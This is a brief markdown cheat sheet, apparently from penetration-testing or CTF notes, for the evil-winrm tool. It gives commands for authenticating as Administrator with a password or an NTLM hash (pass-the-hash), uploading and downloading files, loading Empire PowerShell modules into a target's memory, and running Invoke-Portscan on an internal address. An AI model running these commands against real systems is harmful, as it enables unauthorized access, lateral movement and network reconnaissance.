# evil-winrm * Password or NTLM Hash as authenticator ```sh evil-winrm -u Administrator -H -i IP evil-winrm -u Administrator -p -i IP -P ``` ## Upload & Download * On opened host ```sh upload download ``` ## Load Powershell Scripts into Target Memory * Load attacker scripts into target's memory ```sh evil-winrm -u -p -i IP -s ``` * As an example, load Empire scripts dir for port scanning ```sh evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/ ``` * Init `Invoke-Portscan.ps1` * `Get-Help Invoke-Portscan` ```sh Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50 ```